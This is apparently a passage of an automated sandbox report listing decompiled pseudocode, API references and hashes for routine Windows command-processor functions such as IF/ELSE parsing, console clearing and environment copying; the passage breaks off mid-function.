0x4a73614b
0x4a73614d
0x4a736150
0x4a73615b
0x4a736161
0x4a736162
0x4a736163
0x4a736165
0x4a735857
0x4a735865
0x4a73586f
0x4a735876
0x4a73587b
0x4a735880
0x4a747fdc
0x4a747fdc
0x4a73616b
0x4a73616e
0x4a73616e
0x4a736165
0x4a736173
0x4a736179
0x4a736179
0x4a736106
0x4a73610c
0x4a73610d
0x4a73610e
0x4a736110
0x4a73db68
0x00000000
0x4a73db68
0x00000000
0x4a736110
0x4a7360ed

APIs

_wcsicmp.MSVCRT ref: 4A7360BB
_wcsicmp.MSVCRT ref: 4A736106
_wcsicmp.MSVCRT ref: 4A73615B

Strings

IF/?, xrefs: 4A7360B4
ELSE, xrefs: 4A736156

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: _wcsicmp
String ID: ELSE$IF/?
API String ID: 2081463915-1134991328
Opcode ID: 4404cb1212bde208b4c070e57e1f6c213fd54debe313dd68e5d64b7fbd7ac4c9
Instruction ID: 5360936da6638a001b675683b0e27ac973a309cbd7f2e8f3b42ab6f31403a4c4
Opcode Fuzzy Hash: 4404cb1212bde208b4c070e57e1f6c213fd54debe313dd68e5d64b7fbd7ac4c9
Instruction Fuzzy Hash: 8E41D6B115DB52AEE7705BB5C899A9B7BBCDF022A1F02442AE242DA543DB64C84DC321

Uniqueness

Uniqueness Score: -1.00%

Function 4A7410A5, Relevance: 7.6, APIs: 5, Instructions: 96
fileCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E4A7410A5(void* __eax, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr _a20, intOrPtr _a24, WCHAR* _a28) {
				char _v8;
				void* __ecx;
				int _t22;
				void* _t25;
				signed int _t33;
				void* _t37;
				signed int _t38;
				void* _t39;
				void* _t40;
				void* _t45;
				void* _t46;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t52;
				void* _t58;
				intOrPtr* _t59;

				_t59 = _a16;
				_v8 = 0;
				 *0x4a754120 = 0;
				__imp___get_osfhandle(_a4, _a8, _a12, _t59, 0, _t52, _t58, _t39, _t45);
				_pop(_t46);
				_t22 = ReadFile(__eax, ??, ??, ??, ??);
				_t40 = GetLastError;
				if(_t22 == 0) {
					L17:
					 *0x4a754128 = GetLastError();
					_t25 = E4A733B03(E4A733AB3(_a4), _t46, _a24);
					_push(_a24);
					if(_t25 != 0) {
						E4A733AB3();
					} else {
						E4A733AB3();
						DeleteFileW(_a28);
					}
					L4A74F2D7(_t46,  *0x4a754128, 1);
					asm("int3");
					E4A73185A(_a8, _t40, 0);
					return _v8;
				} else {
					_t50 =  *_t59;
					if(_t50 == 0) {
						if(GetLastError() == 0x3e3) {
							goto L17;
						} else {
							_t50 =  *_t59;
							if(_t50 != 0) {
								goto L2;
							} else {
								 *0x4a754128 = 0;
								_t37 = 0;
							}
							goto L9;
						}
					} else {
						L2:
						_t47 = _a20;
						_t33 =  *(_t47 + 0x1c);
						if((_t33 & 0x0000c000) == 0) {
							if(_t50 < 2 ||  *_a8 != 0xfeff) {
								_t38 = _t33 | 0x00008000;
							} else {
								_t38 = _t33 | 0x00004000;
							}
							 *(_t47 + 0x1c) = _t38;
						}
						if(( *(_t47 + 0x1c) & 0x00008002) == 0x8002) {
							E4A74E4DC(1, _a8, _t59,  &_v8);
							if( *_t59 !=  *_t59) {
								 *0x4a754120 = 1;
							}
						}
						_t37 = 1;
						L9:
						return _t37;
					}
				}
			}

0x4a7410ad
0x4a7410b8
0x4a7410be
0x4a7410c7
0x4a7410cd
0x4a7410cf
0x4a7410d5
0x4a7410dd
0x4a748796
0x4a74879b
0x4a7487a8
0x4a7487ad
0x4a7487b2
0x4a7487c4
0x4a7487b4
0x4a7487b4
0x4a7487bc
0x4a7487bc
0x4a7487d1
0x4a7487d6
0x4a7487dc
0x4a7411d8
0x4a7410e3
0x4a7410e3
0x4a7410e7
0x4a748750
0x00000000
0x4a748752
0x4a748752
0x4a748756
0x00000000
0x4a74875c
0x4a74875c
0x4a748762
0x4a748762
0x00000000
0x4a748756
0x4a7410ed
0x4a7410ed
0x4a7410ed
0x4a7410f0
0x4a7410f8
0x4a7410fd
0x4a741110
0x4a748769
0x4a748769
0x4a748769
0x4a741115
0x4a741115
0x4a741127
0x4a74877e
0x4a748785
0x4a74878b
0x4a74878b
0x4a748785
0x4a74112d
0x4a74112f
0x4a741133
0x4a741133
0x4a7410e7

APIs

_get_osfhandle.MSVCRT ref: 4A7410C7
ReadFile.KERNEL32(00000000), ref: 4A7410CF
GetLastError.KERNEL32 ref: 4A748749
GetLastError.KERNEL32 ref: 4A748796
DeleteFileW.KERNEL32(?,?,?,?), ref: 4A7487BC

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: ErrorFileLast$DeleteRead_get_osfhandle
String ID:
API String ID: 3588551418-0
Opcode ID: 1d1cb8b3638c047d82fa3974b58015d26034cdbc4e3411891b7b6e35b0ea40be
Instruction ID: 1974d3cc765b7b6dfa8c2b801d1fa4ef3581baeafe95f98b40535f76a40f821d
Opcode Fuzzy Hash: 1d1cb8b3638c047d82fa3974b58015d26034cdbc4e3411891b7b6e35b0ea40be
Instruction Fuzzy Hash: 403121B1608149EFDF719F62C888D8E7F7AEB853A0B228529F801D7551CB35DD08CB20

Uniqueness

Uniqueness Score: -1.00%

Function 4A7400DD, Relevance: 7.6, APIs: 5, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E4A7400DD(void* __edx, intOrPtr _a4) {
				signed int _v8;
				short _v10;
				short _v12;
				void* _v14;
				char _v16;
				short _v530;
				short _v532;
				short _v534;
				short _v536;
				int _v540;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t20;
				short _t22;
				short _t25;
				WCHAR* _t28;
				short _t31;
				int _t37;
				void* _t45;
				void* _t46;
				void* _t51;
				WCHAR* _t52;
				void* _t53;
				signed int _t54;

				_t51 = __edx;
				_t20 =  *0x4a7540ac; // 0xbb40e64e
				_v8 = _t20 ^ _t54;
				_t22 = 0x3d;
				_v16 = _t22;
				_v14 = _a4 + 0x40;
				_t25 = 0x3a;
				_v12 = _t25;
				_v10 = 0;
				_t28 = E4A732070( &_v16);
				_t53 = SetCurrentDirectoryW;
				_t45 = SetErrorMode;
				_t52 = _t28;
				if(_t52 == 0) {
					L4:
					_v536 = _v14;
					_v534 = _v12;
					_t31 =  *0x4a770664; // 0x5c
					_v532 = _t31;
					_v530 = 0;
					E4A731730( &_v16,  &_v536);
					_t37 = SetCurrentDirectoryW( &_v536);
					if(_t37 == 0) {
						_push(_t37);
						_push(GetLastError());
						E4A736D44(_t46);
					}
					if(_t52 != 0) {
						SetErrorMode(_v540);
					}
					L2:
					return E4A7313A9(E4A732C56(_t45, _t51, _t52, 0x4a755260, 0x104, 0), _t45, _v8 ^ _t54, _t51, _t52, _t53);
				}
				if(SetCurrentDirectoryW(_t52) == 0) {
					_v540 = SetErrorMode(1);
					goto L4;
				}
				goto L2;
			}

0x4a7400dd
0x4a7400e8
0x4a7400ef
0x4a7400f7
0x4a7400f8
0x4a740102
0x4a740108
0x4a740109
0x4a74010f
0x4a740117
0x4a74011c
0x4a740122
0x4a740128
0x4a74012c
0x4a749bb1
0x4a749bb5
0x4a749bc0
0x4a749bc7
0x4a749bcd
0x4a749bd6
0x4a749be8
0x4a749bf4
0x4a749bf8
0x4a749bfa
0x4a749c01
0x4a749c02
0x4a749c08
0x4a749c0b
0x4a749c17
0x4a749c17
0x4a74013d
0x4a74015c
0x4a74015c
0x4a740137
0x4a749bab
0x00000000
0x4a749bab
0x00000000

APIs

Part of subcall function 4A732070: GetEnvironmentVariableW.KERNEL32(?,4A760640,00002000,75A9F670,?,?,4A73BEFF,00000000), ref: 4A73208E

SetCurrentDirectoryW.KERNEL32(00000000,00000006,4A76C642,0000233F,00000000), ref: 4A740133
SetErrorMode.KERNEL32(00000001), ref: 4A749BA9
SetCurrentDirectoryW.KERNEL32(?,00000006,?,00000006,4A76C642,0000233F,00000000), ref: 4A749BF4
GetLastError.KERNEL32(00000000), ref: 4A749BFB
SetErrorMode.KERNEL32(?), ref: 4A749C17

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: Error$CurrentDirectoryMode$EnvironmentLastVariable
String ID:
API String ID: 295791303-0
Opcode ID: e95f97d970739ec8a5f8c420da44df3226b9599e3fae6b779df2eef4db9de96e
Instruction ID: 98d5ec9bdd6314ceb8c752b7ccc8e1248bc38a1af9d492b3ca26335f29fbe329
Opcode Fuzzy Hash: e95f97d970739ec8a5f8c420da44df3226b9599e3fae6b779df2eef4db9de96e
Instruction Fuzzy Hash: 4721077A90420DAADF20DBF4CC45FDEB7BCAF44740F110096E508EB241EA308A49CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 4A737BDB, Relevance: 7.6, APIs: 5, Instructions: 69
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E4A737BDB() {
				int _t4;
				signed int _t7;
				void* _t8;
				int _t10;
				signed int _t12;
				int* _t15;
				void* _t18;
				void* _t19;
				intOrPtr _t21;

				_t4 = GetConsoleOutputCP();
				 *0x4a7541b8 = _t4;
				if(GetCPInfo(_t4, 0x4a754260) == 0) {
					_t7 = GetThreadLocale() & 0x000003ff;
					__eflags = _t7 - 0x11;
					if(_t7 != 0x11) {
						__eflags = _t7 - 4;
						if(_t7 == 4) {
							L8:
							 *0x4a754266 = 0x81;
							 *0x4a754267 = 0xfe;
							 *0x4a754268 = 0;
							 *0x4a754269 = 0;
							goto L1;
						}
						__eflags = _t7 - 0x12;
						if(_t7 != 0x12) {
							 *0x4a754266 = 0;
							 *0x4a754267 = 0;
							goto L1;
						}
						goto L8;
					}
					 *0x4a754266 = 0x81;
					 *0x4a754267 = 0x9f;
					 *0x4a754268 = 0xe0;
					 *0x4a754269 = 0xfc;
					 *0x4a75426a = 0;
					 *0x4a75426b = 0;
				}
				L1:
				_t8 = memset(0x4a754e40, 0, 0x100);
				_t19 = _t18 + 0xc;
				_t21 =  *0x4a754266; // 0x0
				if(_t21 != 0) {
					_t15 = 0x4a754267;
					while(1) {
						_t8 =  *_t15;
						__eflags = _t8;
						if(_t8 == 0) {
							break;
						}
						_t1 = _t15 - 1; // 0x0
						_t12 =  *_t1 & 0x000000ff;
						_t8 = _t8 & 0x000000ff;
						__eflags = _t12 - _t8;
						if(_t12 <= _t8) {
							_t10 = _t8 - _t12 + 1;
							__eflags = _t10;
							_t2 = 0x4a754e40 + _t12; // 0x4a754e40
							_t8 = memset(_t2, 1, _t10);
							_t19 = _t19 + 0xc;
						}
						_t15 =  &(_t15[0]);
						__eflags =  *(_t15 - 1);
						if( *(_t15 - 1) != 0) {
							continue;
						}
						break;
					}
					 *0x4a754084 = 1;
					__eflags =  *0x4a754267; // 0x0
					if(__eflags == 0) {
						goto L2;
					}
					return _t8;
				}
				L2:
				 *0x4a754084 = 0;
				return _t8;
			}

0x4a737bde
0x4a737bea
0x4a737bf9
0x4a74b8ea
0x4a74b8ef
0x4a74b8f3
0x4a74b922
0x4a74b926
0x4a74b92e
0x4a74b92e
0x4a74b935
0x4a74b93c
0x4a74b942
0x00000000
0x4a74b942
0x4a74b928
0x4a74b92c
0x4a74b94d
0x4a74b953
0x00000000
0x4a74b953
0x00000000
0x4a74b92c
0x4a74b8f5
0x4a74b8fc
0x4a74b903
0x4a74b90a
0x4a74b911
0x4a74b917
0x4a74b917
0x4a737bff
0x4a737c0a
0x4a737c0f
0x4a737c12
0x4a737c18
0x4a74b95f
0x4a74b964
0x4a74b964
0x4a74b966
0x4a74b968
0x00000000
0x00000000
0x4a74b96a
0x4a74b96a
0x4a74b96e
0x4a74b971
0x4a74b973
0x4a74b977
0x4a74b977
0x4a74b979
0x4a74b982
0x4a74b987
0x4a74b987
0x4a74b98b
0x4a74b98c
0x4a74b98f
0x00000000
0x00000000
0x00000000
0x4a74b98f
0x4a74b992
0x4a74b999
0x4a74b99f
0x00000000
0x00000000
0x00000000
0x4a74b99f
0x4a737c1e
0x4a737c1e
0x00000000

APIs

GetConsoleOutputCP.KERNEL32 ref: 4A737BDE
GetCPInfo.KERNEL32(00000000,4A754260), ref: 4A737BEF
memset.MSVCRT ref: 4A737C0A
GetThreadLocale.KERNEL32 ref: 4A74B8E4
memset.MSVCRT ref: 4A74B982

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: memset$ConsoleInfoLocaleOutputThread
String ID:
API String ID: 1263632223-0
Opcode ID: 31e129cde2bd31c72010661b4d820c88308177da0ee3fdb41a9ca167d10596a9
Instruction ID: 8939eb4e7d9c6b7cdf2a6668382b1ce15f883acf48e4cdc59e13c2242e23d28c
Opcode Fuzzy Hash: 31e129cde2bd31c72010661b4d820c88308177da0ee3fdb41a9ca167d10596a9
Instruction Fuzzy Hash: DC21B3F94CE6F1F9D372C37818165903FAE46E3121B1A46A9D4D0CBD82DA050D4DD36E

Uniqueness

Uniqueness Score: -1.00%

Function 4A74CF50, Relevance: 7.6, APIs: 5, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E4A74CF50(int __eax) {
				int _v8;
				char* _v12;
				int _v16;
				char* _t17;
				signed int _t18;
				short* _t24;
				short* _t31;
				short _t32;
				int _t33;
				short* _t36;

				_push(0);
				_push(0);
				_v8 = 1;
				L4A752410();
				_t33 = __eax;
				if(__eax != 0) {
					_t36 = E4A732041(__eax + __eax);
					_t17 = E4A732041(_t33);
					_push(_t17);
					_push(_t33);
					_v12 = _t17;
					L4A752410();
					_t18 = E4A734B8D( *0x4a7541b8);
					asm("sbb eax, eax");
					MultiByteToWideChar( *0x4a7541b8,  ~( ~_t18), _v12, 0xffffffff, _t36, _t33);
					_v16 = SetErrorMode(1);
					while( *_t36 != 0) {
						E4A736C78(_t36, _v8);
						_t24 = _t36;
						_v8 = 0;
						_t8 =  &(_t24[1]); // 0x2
						_t31 = _t8;
						do {
							_t32 =  *_t24;
							_t24 =  &(_t24[1]);
						} while (_t32 != 0);
						_t36 = _t36 + 2 + (_t24 - _t31 >> 1) * 2;
					}
					SetErrorMode(_v16);
					return E4A73142E(_v12);
				}
				return __eax;
			}

0x4a74cf5c
0x4a74cf5d
0x4a74cf5e
0x4a74cf65
0x4a74cf6a
0x4a74cf6e
0x4a74cf7f
0x4a74cf81
0x4a74cf86
0x4a74cf87
0x4a74cf88
0x4a74cf8b
0x4a74cf9d
0x4a74cfa4
0x4a74cfaf
0x4a74cfbf
0x4a74cfe7
0x4a74cfc8
0x4a74cfcd
0x4a74cfcf
0x4a74cfd2
0x4a74cfd2
0x4a74cfd5
0x4a74cfd5
0x4a74cfd9
0x4a74cfda
0x4a74cfe3
0x4a74cfe3
0x4a74cfef
0x00000000
0x4a74cff9
0x4a74cffd

APIs

GetVDMCurrentDirectories.KERNEL32(00000000,00000000), ref: 4A74CF65
GetVDMCurrentDirectories.KERNEL32(00000000,00000000), ref: 4A74CF8B
MultiByteToWideChar.KERNEL32(00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,4A731794,=ExitCode), ref: 4A74CFAF
SetErrorMode.KERNEL32(00000001), ref: 4A74CFBD
SetErrorMode.KERNEL32(00000000,00000000,00000001), ref: 4A74CFEF

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: CurrentDirectoriesErrorMode$ByteCharMultiWide
String ID:
API String ID: 3679696385-0
Opcode ID: 2e6be83219daf24b1648768279c755d1b7484a34a83c71eebbe507d83ad985ab
Instruction ID: 147bac4fe4bb9dcfe8b73ffbc34733795d178d378e8a633bed86721dce3c8e4a
Opcode Fuzzy Hash: 2e6be83219daf24b1648768279c755d1b7484a34a83c71eebbe507d83ad985ab
Instruction Fuzzy Hash: DB11E37290411ABECB206FF5CC48CEEBFBDEF51754B124565E502E7061DA315E49CB90

Uniqueness

Uniqueness Score: -1.00%

Function 4A73D43C, Relevance: 7.6, APIs: 5, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E4A73D43C(void* __ecx, void* __edi, void* __esi) {
				struct _CHAR_INFO _v8;
				struct _COORD _v12;
				struct _SMALL_RECT _v20;
				short _v38;
				signed int _v42;
				struct _CONSOLE_SCREEN_BUFFER_INFO _v44;
				void* _t20;
				union %anon259 _t33;
				void* _t45;

				if(E4A733B03(_t20, __ecx, 1) == 0) {
					_push(E4A747CA8);
					E4A7358F3();
				} else {
					_t45 = GetStdHandle(0xfffffff5);
					if(GetConsoleScreenBufferInfo(_t45,  &_v44) == 0) {
						_push(E4A747CA8);
						E4A7358F3();
					} else {
						_v12.Y =  ~_v42;
						_v12.X = 0;
						_v20.Top = 0;
						_v20.Left = 0;
						_v20.Bottom = _v42;
						_v20.Right = _v44.dwSize;
						_t33 = 0x20;
						_v8.UnicodeChar = _t33;
						_v8.Attributes = _v44.wAttributes;
						ScrollConsoleScreenBufferW(_t45,  &_v20, 0, _v12,  &_v8);
						_v44.dwCursorPosition.X = 0;
						_v38 = 0;
						SetConsoleCursorPosition(GetStdHandle(0xfffffff5), _v44.dwCursorPosition);
					}
				}
				return 0;
			}

0x4a73d44d
0x4a747c87
0x4a747c8c
0x4a73d453
0x4a73d45f
0x4a73d46e
0x4a747c97
0x4a747c9c
0x4a73d474
0x4a73d479
0x4a73d47f
0x4a73d483
0x4a73d487
0x4a73d48f
0x4a73d499
0x4a73d49d
0x4a73d49e
0x4a73d4a6
0x4a73d4b8
0x4a73d4c0
0x4a73d4c4
0x4a73d4d0
0x4a73d4d0
0x4a73d4d7
0x4a73d4db

APIs

Part of subcall function 4A733B03: _get_osfhandle.MSVCRT ref: 4A733B0D
Part of subcall function 4A733B03: GetFileType.KERNEL32(00000000), ref: 4A733B17

GetStdHandle.KERNEL32(000000F5,?,?,00000001), ref: 4A73D45D
GetConsoleScreenBufferInfo.KERNEL32 ref: 4A73D466
ScrollConsoleScreenBufferW.KERNEL32(00000000,?,00000000,?,?), ref: 4A73D4B8
GetStdHandle.KERNEL32(000000F5,?,?,?,00000001), ref: 4A73D4CD
SetConsoleCursorPosition.KERNEL32 ref: 4A73D4D0

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: Console$BufferHandleScreen$CursorFileInfoPositionScrollType_get_osfhandle
String ID:
API String ID: 3008996577-0
Opcode ID: c10d9907b13bf0b819effb55b9ca801686798af05f98e2fa8d75d9c6c01ca870
Instruction ID: f4dd49f7830b6cd286dceef968944e1e38dd13f6e373ffacf8ad3f5c53b0eade
Opcode Fuzzy Hash: c10d9907b13bf0b819effb55b9ca801686798af05f98e2fa8d75d9c6c01ca870
Instruction Fuzzy Hash: 7211B12AA15249AACF109BE4C804AEE7BBCBF4D711F114116E510F7151EB308A44C769

Uniqueness

Uniqueness Score: -1.00%

Function 4A737C89, Relevance: 7.6, APIs: 5, Instructions: 50
timethreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E4A737C89() {
				struct _FILETIME _v12;
				signed int _v16;
				union _LARGE_INTEGER _v20;
				signed int _t14;
				signed int _t16;
				signed int _t17;
				signed int _t18;
				signed int _t22;
				signed int _t23;
				signed int _t32;

				_t14 =  *0x4a7540ac; // 0xbb40e64e
				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
				_v12.dwHighDateTime = _v12.dwHighDateTime & 0x00000000;
				if(_t14 != 0xbb40e64e) {
					if((0xffff0000 & _t14) == 0) {
						goto L1;
					}
					_t23 =  !_t14;
					 *0x4a7540b0 = _t23;
					return _t23;
				}
				L1:
				GetSystemTimeAsFileTime( &_v12);
				_t16 = GetCurrentProcessId();
				_t17 = GetCurrentThreadId();
				_t18 = GetTickCount();
				QueryPerformanceCounter( &_v20);
				_t22 = _v16 ^ _v20.LowPart;
				_t32 = _v12.dwHighDateTime ^ _v12.dwLowDateTime ^ _t16 ^ _t17 ^ _t18 ^ _t22;
				if(_t32 == 0xbb40e64e || ( *0x4a7540ac & 0xffff0000) == 0) {
					_t32 = 0xbb40e64f;
				}
				 *0x4a7540ac = _t32;
				 *0x4a7540b0 =  !_t32;
				return _t22;
			}

0x4a737c91
0x4a737c96
0x4a737c9a
0x4a737cac
0x4a74bc8e
0x00000000
0x00000000
0x4a74bc94
0x4a74bc96
0x00000000
0x4a74bc96
0x4a737cb2
0x4a737cb7
0x4a737cc3
0x4a737ccb
0x4a737cd3
0x4a737cdf
0x4a737ce8
0x4a737ceb
0x4a737cef
0x4a737d0c
0x4a737d0c
0x4a737cf9
0x4a737d01
0x00000000

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 4A737CB7
GetCurrentProcessId.KERNEL32 ref: 4A737CC3
GetCurrentThreadId.KERNEL32 ref: 4A737CCB
GetTickCount.KERNEL32 ref: 4A737CD3
QueryPerformanceCounter.KERNEL32(?), ref: 4A737CDF

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: c7f940fe8c1a2e5a66296f5ab74b2cd7b911fed3a3bfbab670cd09d6889720a0
Instruction ID: b97d4890de43a928b6b5b13e9c1fc8d582d3aec1011b8e7e2fc5b9aff098fe31
Opcode Fuzzy Hash: c7f940fe8c1a2e5a66296f5ab74b2cd7b911fed3a3bfbab670cd09d6889720a0
Instruction Fuzzy Hash: 9B115EF3D042249BCB30DBF9C84969ABBFCEB49292F570561E905E7601DB309D04CB91

Uniqueness

Uniqueness Score: -1.00%

Function 4A733BE0, Relevance: 7.5, APIs: 5, Instructions: 33
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E4A733BE0(void* __ecx, void* _a4) {
				long _v8;
				int _t11;

				_v8 = _v8 | 0xffffffff;
				 *0x4a754088 = 0;
				WaitForSingleObject(_a4, 0xffffffff);
				_t11 = GetExitCodeProcess(_a4,  &_v8);
				if(_v8 == 0xc000013a) {
					E4A74E702(_t11);
					fprintf(__imp___iob + 0x40, 0x4a74bd48);
					fflush(__imp___iob + 0x40);
				}
				 *0x4a754088 = 1;
				CloseHandle(_a4);
				return _v8;
			}

0x4a733be6
0x4a733bef
0x4a733bf6
0x4a733c03
0x4a733c10
0x4a749a6f
0x4a749a82
0x4a749a91
0x4a749a97
0x4a733c19
0x4a733c20
0x4a733c2a

APIs

WaitForSingleObject.KERNEL32(4A754210,000000FF,?,?,4A74FD89,4A754210,?,4A7477AE,?,00000000,4A76C642,0000233F,4A743801,4A76C642,0000233F,00000000), ref: 4A733BF6
GetExitCodeProcess.KERNEL32(4A754210,000000FF), ref: 4A733C03
CloseHandle.KERNEL32(4A754210), ref: 4A733C20
fprintf.MSVCRT ref: 4A749A82
fflush.MSVCRT ref: 4A749A91

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: CloseCodeExitHandleObjectProcessSingleWaitfflushfprintf
String ID:
API String ID: 1826527819-0
Opcode ID: 430847eae7197e254578c415ea0557bb691c58267fcb714cd15ef0cd341c34ba
Instruction ID: 8f99afc07f08b819ef982ab98d3b232204e6b2e588c76662938f5e6819f80be7
Opcode Fuzzy Hash: 430847eae7197e254578c415ea0557bb691c58267fcb714cd15ef0cd341c34ba
Instruction Fuzzy Hash: A9F081F6449185EFDF209BA4CD0AA893BBCAB023A6F124140F459D6691C7318E54DB11

Uniqueness

Uniqueness Score: -1.00%

Function 4A7316AD, Relevance: 7.5, APIs: 5, Instructions: 32
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E4A7316AD() {
				int _t9;
				WCHAR* _t11;
				void* _t12;

				_t11 = GetEnvironmentStringsW();
				_t12 = 0;
				if(_t11 != 0) {
					_t9 = E4A7316FB(_t11);
					_t12 = HeapAlloc(GetProcessHeap(), 8, _t9);
					if(_t12 != 0) {
						memcpy(_t12, _t11, _t9);
					}
					FreeEnvironmentStringsW(_t11);
				}
				return _t12;
			}

0x4a7316b7
0x4a7316b9
0x4a7316bd
0x4a7316c6
0x4a7316d8
0x4a7316dc
0x4a7316e1
0x4a7316e6
0x4a7316ea
0x4a7316f0
0x4a7316f5

APIs

GetEnvironmentStringsW.KERNEL32(?,?,4A737AF8,4A738533), ref: 4A7316B1
GetProcessHeap.KERNEL32(00000008,00000000,00000000,00000000), ref: 4A7316CB
HeapAlloc.KERNEL32(00000000), ref: 4A7316D2
memcpy.MSVCRT ref: 4A7316E1
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 4A7316EA

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: EnvironmentHeapStrings$AllocFreeProcessmemcpy
String ID:
API String ID: 713576409-0
Opcode ID: 2d796212b19f16ff8eeb8f7a7643a56f2ec806b3163df43d6151ac2a8fe40961
Instruction ID: 1033e3004c4b01be2416fb02f7e53f2b0d39bc3c2726d13566f625d2516113c0
Opcode Fuzzy Hash: 2d796212b19f16ff8eeb8f7a7643a56f2ec806b3163df43d6151ac2a8fe40961
Instruction Fuzzy Hash: 01E06DB3607921AB9A3122E99C8DCBB6F7CDBC69E27074154F904D2605DF208C06C3A1

Uniqueness

Uniqueness Score: -1.00%

Function 4A73B589, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 309
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E4A73B589(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, WCHAR* _a20, intOrPtr _a24, intOrPtr* _a28, signed int* _a32) {
				signed int _v8;
				short _v524;
				short _v526;
				char _v528;
				intOrPtr _v532;
				intOrPtr* _v536;
				WCHAR* _v540;
				signed int* _v544;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t63;
				intOrPtr* _t73;
				signed int _t75;
				intOrPtr* _t78;
				intOrPtr _t84;
				intOrPtr* _t85;
				short _t87;
				WCHAR* _t96;
				signed char _t100;
				long _t106;
				intOrPtr* _t118;
				intOrPtr* _t122;
				signed int _t128;
				intOrPtr* _t129;
				short _t131;
				intOrPtr* _t133;
				signed int _t135;
				signed int _t136;
				intOrPtr _t142;
				intOrPtr* _t143;
				intOrPtr* _t144;
				WCHAR* _t145;
				intOrPtr _t149;
				signed int _t150;
				intOrPtr* _t151;
				signed int _t153;
				WCHAR* _t155;
				signed int _t158;
				signed int _t161;
				intOrPtr* _t162;
				signed int _t165;
				short* _t166;
				signed int _t167;
				void* _t168;
				signed int _t170;
				signed int* _t171;
				void* _t172;
				intOrPtr _t173;
				signed int _t177;
				intOrPtr* _t181;
				signed int _t183;
				void* _t184;
				signed int _t187;
				void* _t209;

				_t147 = __ecx;
				_t63 =  *0x4a7540ac; // 0xbb40e64e
				_v8 = _t63 ^ _t187;
				_v532 = _a12;
				_v540 = _a20;
				_v536 = _a28;
				_v544 = _a32;
				E4A739A0D(__ecx, E4A73321B(__ecx, L"COPYCMD"), _a8);
				_t143 = E4A7322CA( *((intOrPtr*)(_a4 + 0x3c)), 0, 0);
				if(E4A739A0D(_t147, _t143, _a8) == 0) {
					L2:
					_t73 = _t143;
					_t13 = _t73 + 2; // 0x2
					_t166 = _t13;
					do {
						_t148 =  *_t73;
						_t73 = _t73 + 2;
					} while (_t148 != 0);
					_t75 = _t73 - _t166;
					_t170 = _t75 >> 1;
					if(_t75 == 0) {
						L42:
						_push(0x232a);
						L43:
						L4A74DF02(_t148, _t166);
						L44:
						_push( *0x4a754128);
						goto L43;
					}
					if(_t170 >= 0x104) {
						L35:
						_push(0x232e);
						goto L43;
					}
					_t78 = _t143;
					_t14 = _t78 + 2; // 0x2
					_t166 = _t14;
					do {
						_t149 =  *_t78;
						_t78 = _t78 + 2;
						_t194 = _t149;
					} while (_t149 != 0);
					E4A73185A(_t143, (_t78 - _t166 >> 1) + 1, E4A732598(_t149, _t143));
					_t84 = E4A739662(_t149, _t166, _t194, _t143);
					_t148 = _v536;
					 *_v536 = _t84;
					if(_t84 == 1) {
						goto L44;
					}
					_t17 = _t170 * 2; // 0x2
					_t181 = _t143 + _t17 + 2;
					if( *_t181 == 0) {
						_t85 =  *0x4a754124; // 0x0
						_v528 =  *_t85;
						_t87 = 0x3a;
						_v526 = _t87;
						_v524 = 0;
						L18:
						_t182 = _a16;
						if(E4A732FAF(_t148, _v532, _a16, _t143) != 0) {
							goto L35;
						}
						_t144 = _v536;
						if(( *( *( *_t144 + 0x18)) & 0x00000010) == 0) {
